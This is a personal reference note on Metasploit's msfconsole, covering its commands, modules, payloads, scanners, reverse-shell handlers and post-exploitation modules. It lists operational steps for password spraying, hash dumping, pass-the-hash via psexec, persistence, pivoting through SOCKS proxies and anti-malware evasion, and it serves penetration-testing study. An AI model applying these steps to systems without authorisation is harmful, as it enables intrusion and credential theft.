# msfconsole Basic Metasploit flow: - `use $MODULE_NAME` - `set $OPTIONS` - `run` You can use msfconsole as a shell, but there's no redirect functionality. ## Commands - `back` - exit the current module - `db_nmap $FLAGS $IP` - run [[Nmap]] and dump the results into the Metasploit DB; all [[Nmap]] `$FLAGS` are supported and Metasploit will elevate privileges if necessary - `help` - get Metasploit help - `history` - display command history - `hosts` - display known hosts in DB - `hosts -d` - delete saved hosts from DB - `info` - show module information (including exploit target options) - `jobs` - check the status of background jobs - `options` (`advanced`) - show module/exploit options (or "advanced" options) - `run`/`exploit` - run the selected exploit - `run -j` - run the selected exploit as a background job - `search` - search modules; query to a particular type of module using the `type:` parameter (e.g., `search type:exploit wordpress`) - `services` - display services discovered in known hosts in DB - `sessions` - list open [[meterpreter]] sessions on a box - `sessions -i $SESSION_NUMER` - connect to [[meterpreter]] session `$SESSION_NUMBER` - `show auxiliary` - show auxiliary modules, filtered by relevancy if called from within a module - `show exploits` - show exploit modules - `show options` - show module options - `show payloads` - show payload modules, filtered by relevancy if called from within a module - `spool` - save all console output to a log file (useful for record-keeping) - `use` - select a Metasploit module/exploit - `vulns` - display vulnerabilities discovered in known hosts in DB - `workspace` - use workspaces; keeps database results isolated per engagement Note that you can also call regular shell commands (ip, ls, etc.) from msfconsole. You can also background processes using `Ctrl + Z` (Metasploit will trap this, so you don't have to worry about backgrounding the entire msfconsole). ## Modules Module categories: - Auxiliary (odds-n-ends) - Encoders (re-encode exploits to thwart signature-based anti-malware solutions) - Evasion (attempt to directly evade anti-malware solutions) - Exploits - NOPS (no-op code that can be used to pad exploits to a needed size) - Payloads (what you want to run if the exploit is successful; often, but not always, some kind of shell) - Post (additional post-exploitation tools) Note that Metasploit 6 apparently calls these "framework plugins" now. - **Remember:** Open up the port Metasploit's going to use in your firewall *before* running the exploit. Generally this is port 4444 by default (set with LPORT). - **Also Remember:** Be sure to set LHOST (and, when applicable, SRVHOST) correctly, even if it's not indicated by the module. Metasploit's guesses about which interface to use aren't always correct... (I find using the explicit IP address works better than specifying the interface device or leaving SRVHOST at the default of 0.0.0.0.) - **Also *also* Remember:** Sometimes you might find yourself in the position of trying to exploit a service over an [[SSH]] tunnel (for example, if you're trying to exploit a service that's not exposed externally in order to elevate your privileges). When doing this, remember that LHOST is still your machine's external address, as the exploit won't be connecting back over the [[SSH]] tunnel (obviously)! Since LHOST is also used to determine where the exploit's listener binds to, it's sometimes necessary to set the optional ReverseListenerBindAddress in these cases (typically when you do this, LHOST will be some remote system you're tunneled into, and ReverseListenerBindAddress will be 127.0.0.1). ### Options The common RHOSTS option accepts IP addresses, ranges, CIDR networks, and even a file with one target per line (specify as `file:/path/to/file.txt`). Most modules support the ARCH, PAYLOAD, and SESSION options (for specifying target architecture, the payload to deliver, or session number to connect to). However, these are *not* shown when running `show options`. You can reset individual parameters using `unset`, and reset the entire module using `unset all`. Equivalent module commands: - `set -g` = `setg` - `unset -g` = `unsetg` - `run` = `exploit` Some exploit modules have a `check` option which attempts to determine if a target is vulnerable without actually exploiting it. Alternately, other modules have a paired auxiliary scanner. Many *don't* have a check at all. YMMV! ## Payloads Payloads can be divided into: - Singles (self-contained; also indicated by the use of an `_` separating "shell" from the rest of the payload name, as in `shell_reverse_tcp`) - Stagers (small applications that establish a connection back to the attacker to download a larger, more complex payload) - Stages (payloads designed to be downloaded by a stager; also indicated by the use of a `/` separating "shell" from the rest of the payload name, as in `shell/reverse_tcp`) Payloads follow the OS/ARCHITECTURE/PAYLOAD (though ARCHITECTURE is not included for 32-bit Windows payloads). > [!important] > Metasploit defaults to sending 32-bit payloads, but an increasing number of things won't work on a 64-bit system from a 32-bit [[meterpreter]] shell. It's probably best to explicitly set the `payload` option to use a 64-bit payload unless you *know* that you'll be dealing with a 32-bit system. List all available payloads using `msfvenom --list payloads` or `show payloads` from within the Metasploit console. A specific payload can be set in the Metasploit console use the `set PAYLOAD full/path/to/payload`. If you initially get a native shell, use the `post/multi/manage/shell_to_meterpreter` module to upgrade to Meterpeter. > [!note] > `shell_to_meterpreter` creates a new connection on a new port, by default 4433. ### Scanners Use `search portscan` to display built-in Metasploit port scanners. Note that msfconsole needs to be run as root for many scans to work - just like [[Nmap]]. That said, in my experience the fancier [[TCP]] scans (for example, SYN) don't work over a VPN... So maybe best to stick with [[Nmap]]. Targeted scanners can be more useful, however: - The `auxiliary/scanner/discovery/udp_sweep` module will probe for common [[UDP]] services. - The `auxiliary/scanner/http/http_version` module will give you [HTTP](HTTP.md) server version information. - The `auxiliary/scanner/smb/smb_login` module will allow you to conduct brute-force and password spraying attacks against Samba logins. Metasploit has a variety of Samba/CIFS scanners too (use `search scanner/smb` to list them), as well as modules for basic enumeration such as `smtp_version`/`smtp_enum` (for [[SMTP]]) and `mysql_sql` (for [[MySQL]], though this seems to just be a thin wrapper around the [[MySQL]] command line client). ### Exploits - `exploit/multi/handler` - Catch a shell produced using [[msfvenom]]. Note that you'll need to use `set payload` to tell Metasploit *what* it's catching - for example, `windows/meterpreter/reverse_tcp` (or `windows/x64/meterpreter/reverse_tcp`). Both regular reverse shells and [[meterpreter]] sessions can be caught this way. - `exploit/windows/smb/psexec` - Call PsExec over SMB (instantiates [[meterpreter]] by default). *Only works if `SMBUser` has admin privileges on the target!* Note that any Windows exploit that requires a password will also accept an NTLM hash (the LMHash part can be replaced by an appropriately-sized string of 0 characters if not available). ### meterpreter Potentially useful Metsploit modules to `run` from/besides [[meterpreter]]: - `post/windows/gather/checkvm` - try to determine if we're in a VM - `post/multi/recon/local_exploit_suggester` - find possible privilege escalation exploits (can be slow/unreliably on 64-bit architectures) - `post/windows/gather/enum_shares` - enumerate shares - `auxiliary/scanner/smb/smb_enumusers_domain` - enumerate SMB domain users (requires existing admin credentials) - `post/windows/gather/hashdump` - same as the [hashdump command](https://www.utc.edu/sites/default/files/2021-04/4660-lab6.pdf), but pushes the hashes into the Metasploit DB - `post/windows/gather/smart_hashdump GETSYSTEM=FALSE` - same as the hashdump command, but pushes the hashes into the Metasploit DB and ignores system accounts - `auxiliary/analyze/crack_windows` - sic [[John the Ripper]] or [[Hashcat]] on [[NTLM hashes]] stored in the Metasploit DB - `post/windows/manage/enable_rdp` - enable RDP access (requires admin privileges) - `post/multi/manage/autoroute` - manipulate target routing for pivoting - `auxiliary/server/socks_proxy` - start a SOCKS proxy - `exploit/windows/local/persistence` - sets up a persistent connection (you probably want to `set STARTUP SYSTEM`)... *without a password!* > [!tip] > It is generally more useful to background [[meterpreter]] and then run these commands through the Metasploit console, as within [[meterpreter]] they need to have all options specified on the "run" command line (in the console you can access help, actually *see* what the options are, etc.). There seem to be a lot of options for the `post/multi/manage/autoroute` and `auxiliary/server/socks_proxy` modules, but I don't see a way to access them from [[meterpreter]] (it looks like to get help you need to background [[meterpreter]] and use the console). The advantage of setting up a SOCKS proxy on the target is that you can then use proxychains to route through the target; this can allow you to pivot more deeply into the network that you're attacking. (You probably want to create a custom proxychains.conf file to do this. Fortunately, /etc/proxychains.conf is well documented.) ### CIFS Metasploit can also enumerate CIFS users using the `auxiliary/smb/smb_lookupsid` module. Like [[Nmap]], I've found this to be a bit unreliable on UNIX-like systems. ### MS SQL ![[Metasploit MS SQL modules|spells/Metasploit MS SQL modules]]